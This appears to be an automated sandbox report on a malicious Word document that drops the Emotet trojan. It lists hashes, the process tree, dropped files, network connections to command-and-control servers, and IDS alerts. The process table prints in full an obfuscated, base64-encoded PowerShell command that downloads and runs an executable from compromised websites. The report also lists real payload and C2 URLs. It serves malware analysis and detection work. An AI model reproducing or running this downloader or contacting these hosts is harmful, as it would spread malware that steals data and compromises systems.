File name: | f8e3187b6fa302dab812d38fb45409d8 |
Full analysis: | https://app.any.run/tasks/4557650c-4e8a-4b52-acc5-3b2f17c2ee69 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | April 25, 2019, 17:24:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Apr 25 10:26:00 2019, Last Saved Time/Date: Thu Apr 25 10:26:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | F8E3187B6FA302DAB812D38FB45409D8 |
SHA1: | 3CED585C0F944D35DFA7C6FC8FB70DB5A43E5E94 |
SHA256: | 7A32C78114368D7E0FF4A99FF1DAB817060C58AD5E1C18CD2C1178255090C42C |
SSDEEP: | 3072:i77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qdJKdRDGHKmA907tokI8w11T9:i77HUUUUUUUUUUUUUUUUUUUT52VmKdtF |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 3 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 3 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:04:25 09:26:00 |
CreateDate: | 2019:04:25 09:26:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2832 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f8e3187b6fa302dab812d38fb45409d8.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2460 | powershell -e JAB0ADQAMQBBAEEARAB4AD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBYACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQBCACcALAAnAEsAJwApACwAJwBVAEcAJwApACkAOwAkAFoAMQBYAHgAQQBBACAAPQAgACcAMwA4ADYAJwA7ACQAQgBVAEMAMQBEAG8APQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAgAC0AZgAgACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAQQAxAGMAJwAsACcAWgAnACkALAAnAGgAJwAsACcAVQAnACkAOwAkAGMAQQBCAFEAQQBBAHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFoAMQBYAHgAQQBBACsAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC4AZQB4ACcALAAnAGUAJwApADsAJABjAEMAMQAxAHcAUQA9ACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBmACcAQQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAFcAVQAnACwAJwBBAEcAJwApACwAJwBBAHgAJwApADsAJABxAFEAWAAxAEcAQQBBAHgAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQBgAFQALgB3AEUAYgBjAGAAbABgAGkARQBOAHQAOwAkAGYAQQBjAEEARABDADQAPQAoACIAewAwAH0AewA0AH0AewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAzADcAfQB7ADIAOQB9AHsANQB9AHsAMQB9AHsAOQB9AHsAMQAyAH0AewAyADMAfQB7ADgAfQB7ADMAfQB7ADMAMQB9AHsAMgAyAH0AewAzADAAfQB7ADMAOAB9AHsAMgA1AH0AewAzADMAfQB7ADEANgB9AHsAMgA4AH0AewAxADAAfQB7ADEAMwB9AHsAMwA2AH0AewAzADQAfQB7ADEAOAB9AHsANgB9AHsAMwA1AH0AewAxADUAfQB7ADIAfQB7ADIANwB9AHsAMQA5AH0AewAyADQAfQB7ADMAMgB9AHsAMgAwAH0AewAyADYAfQB7ADcAfQB7ADEANAB9ACIALQBmACAAJwBoAHQAdAAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBuAGMAbAAnACwAJwBpACcAKQAsACcAZQBVAF8AJwAsACcAcgAnACwAJwBwACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAG8AbQAvACcALAAnAHcAcAAtACcAKQAsACgAIgB7ADEAfQB7ADIAfQB7ADMAfQB7ADAAfQAiAC0AZgAgACcAbQAnACwAJwByAGEAcgAnACwAJwBkAGEAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAZAAnACwAJwAuAGMAbwAnACkAKQAsACcAbgAnACwAJwBuAC4AbwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwB1AGQAJwAsACcAZQBzACcAKQAsACcAbwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBjAHQAYQAnACwAJwB3ACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHgAdgAnACwAJwAvAEAAJwApACwAJwAvAEUAXwAnACkALAAnAG0ALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC8AbQBfACcALAAnAHQAJwApACwAJwBSAC8AJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwAtAGEAJwAsACcALwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBkAG0AJwAsACcAaQBuACcAKQApACwAJwAvAC8AYwAnACwAJwA6AC8AJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACAAJwBAACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAC8AJwAsACcALwBxAGEAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAGgAJwAsACcAdAB0AHAAOgAnACkAKQAsACcAaAB0AHQAJwAsACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAcAAtAGMAJwAsACcAbwAnACkALAAnAC8AdwAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcAZQBzACcALAAnAHUAcgAuACcAKQAsACcAbgAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAvAG0AYwAnACwAJwBjAGwAJwApACkALAAnAC8AcwBlACcALAAnAGwAJwAsACgAIgB7ADIAfQB7ADAAfQB7ADEAfQB7ADMAfQAiAC0AZgAgACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAHQAdABwACcALAAnADoAJwAsACcALwAvACcAKQAsACcAaQBrAGEAJwAsACcAaAAnACwAJwB0AGEAJwApACwAJwBwACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnADEALwAnACwAJwBAAGgAJwApACwAJwB0AGUAJwAsACcARgAvAEAAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwByAC4AYwAnACwAJwBhAHUAYQAnACkALAAnAGMAJwAsACgAIgB7ADAAfQB7ADIAfQB7ADEAfQAiACAALQBmACcAdQBkACcALAAnAFkAJwAsACcAZQBzAC8AJwApACwAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwAvAHcAJwAsACcAcAAtAGkAJwApACwAJwBnACcALAAnAG4AYwAnACkALAAnADoALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAcAA6ACcALAAnAHQAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAG4ALwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAFYALwAnACwAJwBNAF8AJwApACkALAAnAC8AdwBwACcALAAoACIAewAwAH0AewAxAH0AewAyAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwB3ACcALAAnAHAALQBhACcAKQAsACcAZAAnACwAJwBtAGkAJwApACwAJwBhAHkALgAnACwAJwBfACcAKQAuACIAcwBQAGAATABpAHQAIgAoACcAQAAnACkAOwAkAGwAVQBYAEEAQQB3AD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAEEAeABvACcALAAnAHAAVQAnACwAJwB4AEEAJwApACwAJwBBACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAWgA0AHcAVQBBAGMAQQAgAGkAbgAgACQAZgBBAGMAQQBEAEMANAApAHsAdAByAHkAewAkAHEAUQBYADEARwBBAEEAeAAuACIAZABgAG8AdwBuAEwAbwBhAGQARgBpAGAATABFACIAKAAkAGkAWgA0AHcAVQBBAGMAQQAsACAAJABjAEEAQgBRAEEAQQB4ACkAOwAkAEwARABCAEMAXwBCAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAXwB4ACcALAAnAEQAQgBYACcAKQAsACcAVAA0AFUAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAGMAQQBCAFEAQQBBAHgAKQAuACIATABFAE4ARwBgAFQAaAAiACAALQBnAGUAIAAzADEANQA0ADIAKQAgAHsALgAoACcASQBuAHYAbwBrAGUALQBJACcAKwAnAHQAJwArACcAZQBtACcAKQAgACQAYwBBAEIAUQBBAEEAeAA7ACQASwB3AEEAbwBVAEEAQQBaAD0AKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIAIAAtAGYAJwBRAEIAJwAsACcAagBfACcALAAnAHcAdwBaACcAKQA7AGIAcgBlAGEAawA7ACQAdwA0AFEAXwBCAEIAWABBAD0AKAAiAHsAMAB9AHsAMQB9ACIALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBJAFUAJwAsACcAQQB3ACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAWgBEACcALAAnAEEAXwAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQBBAEQAbwBBAEcAQQA9ACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGIAQgAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAEEAQQAnACwAJwAxAEIAJwApACkA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2412 | "C:\Users\admin\386.exe" | C:\Users\admin\386.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3624 | --74d7ff2f | C:\Users\admin\386.exe | 386.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3124 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | 386.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3932 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | soundser.exe | |
User: admin Integrity Level: MEDIUM |
PID | Process | Filename | Type | |
---|---|---|---|---|
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRFCF6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8LQQARD8165TC53JEJWS.temp | — | |
MD5:— | SHA256:— | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6F5920B47E86D4FD5D6A13574A89ADDE | SHA256:8042B4CB8D5210F331BFA6B5323D23C5C0490E65DDF4DE726712C5206AD78298 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | |
MD5:6877DD2BC3630A1E8653853982D3FE91 | SHA256:9016B7C93A370F43B45D9C72A4FBF65BFA07EDC48251B2A0521A3F574ED60DF2 | |||
2460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
3624 | 386.exe | C:\Users\admin\AppData\Local\soundser\soundser.exe | executable | |
MD5:A8A91E019ED26398DC25902059E2A179 | SHA256:5438104F416BB8A85E3352871E0D05B137548134AF616058DDB3F98BDE0D1353 | |||
2832 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$e3187b6fa302dab812d38fb45409d8.doc | pgc | |
MD5:834EEB6EEA93991EAB48818135D0BB54 | SHA256:FA14CCEFA2F1B24FBA3DBAC7A44A8ED8C533B3A75F1E9F4BF2DF2BB3D9B360BF | |||
2460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13064c.TMP | binary | |
MD5:5F9A7BF5388376D94C2EDCA422810BEC | SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C | |||
2460 | powershell.exe | C:\Users\admin\386.exe | executable | |
MD5:A8A91E019ED26398DC25902059E2A179 | SHA256:5438104F416BB8A85E3352871E0D05B137548134AF616058DDB3F98BDE0D1353 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3932 | soundser.exe | POST | — | 77.111.149.55:80 | http://77.111.149.55/results/cone/ringin/merge/ | HU | — | — | malicious |
3932 | soundser.exe | POST | — | 191.92.69.115:80 | http://191.92.69.115/results/rtm/ringin/merge/ | CO | — | — | malicious |
3932 | soundser.exe | POST | — | 159.0.130.149:443 | http://159.0.130.149:443/entries/pnp/ringin/merge/ | SA | — | — | malicious |
2460 | powershell.exe | GET | 200 | 103.6.198.63:80 | http://ikatan.org/wp-includes/Y_1/ | MY | executable | 78.0 Kb | suspicious |
3932 | soundser.exe | GET | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/whoami.php | US | text | 14 b | malicious |
3932 | soundser.exe | POST | 200 | 149.255.56.242:8080 | http://149.255.56.242:8080/iab/img/ringin/ | GB | binary | 148 b | malicious |
3932 | soundser.exe | POST | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/pnp/img/ringin/merge/ | US | binary | 36.6 Kb | malicious |
3932 | soundser.exe | POST | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/pdf/ | US | binary | 41.4 Kb | malicious |
3932 | soundser.exe | POST | 200 | 198.58.114.91:4143 | http://198.58.114.91:4143/symbols/prov/ringin/merge/ | US | binary | 41.3 Kb | malicious |
3932 | soundser.exe | POST | 200 | 149.255.56.242:8080 | http://149.255.56.242:8080/nsip/add/ | GB | binary | 705 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2460 | powershell.exe | 68.66.224.6:80 | sectaway.com | A2 Hosting, Inc. | US | suspicious |
3932 | soundser.exe | 77.111.149.55:80 | — | Tarr Kft. | HU | malicious |
3932 | soundser.exe | 159.0.130.149:443 | — | Saudi Telecom Company JSC | SA | malicious |
2460 | powershell.exe | 103.6.198.63:80 | ikatan.org | Exa Bytes Network Sdn.Bhd. | MY | suspicious |
3932 | soundser.exe | 149.255.56.242:8080 | — | Awareness Software Limited | GB | malicious |
3932 | soundser.exe | 191.92.69.115:80 | — | — | CO | malicious |
3932 | soundser.exe | 74.208.5.15:587 | smtp.mail.com | 1&1 Internet SE | US | malicious |
3932 | soundser.exe | 212.227.15.183:25 | smtp.1und1.de | 1&1 Internet SE | DE | malicious |
3932 | soundser.exe | 198.58.114.91:4143 | — | Linode, LLC | US | malicious |
3932 | soundser.exe | 173.201.193.228:25 | smtpout.secureserver.net | GoDaddy.com, LLC | US | suspicious |
Domain | IP | Reputation |
---|---|---|
sectaway.com |
| suspicious |
ikatan.org |
| suspicious |
smtp.mail.com |
| shared |
smtp.cox.net |
| shared |
smtp.1und1.de |
| shared |
smtp.everyone.net |
| shared |
smtp.mail.wowway.com |
| unknown |
smtpout.secureserver.net |
| whitelisted |
mail.winsfgt.com |
| unknown |
priority1protection.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
2460 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2460 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2460 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3932 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3932 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3932 | soundser.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3932 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3932 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 3 |
3932 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |
3932 | soundser.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |